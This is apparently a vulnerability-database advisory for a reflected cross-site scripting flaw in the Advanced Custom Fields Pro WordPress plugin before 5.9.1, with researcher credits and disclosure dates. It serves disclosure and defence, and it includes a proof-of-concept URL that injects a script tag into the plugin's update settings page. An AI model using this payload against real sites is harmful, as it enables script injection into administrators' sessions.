WordPress Plugin Vulnerabilities

Advanced Custom Field Pro < 5.9.1 - Authenticated Reflected Cross-Site Scripting (XSS)

Description

The plugin did not properly escape the generated update URL when outputting it in an attribute, leading to a reflected Cross-Site Scripting issue in the update settings page.

Proof of Concept

https://example.com/wp-admin/edit.php?post_type=acf-field-group&page=acf-settings-updates&"><script>alert('XSS')</script>

Affects Plugins

References

Classification

Type
XSS
CWE
CVSS

Miscellaneous

Original Researcher
Juan David Ordoñez Noriega
Submitter
Juan David Ordoñez Noriega
Verified
Yes

Timeline

Publicly Published
2021-01-20 (about 2 years ago)
Added
2021-04-02 (about 2 years ago)
Last Updated
2021-06-09 (about 2 years ago)

Other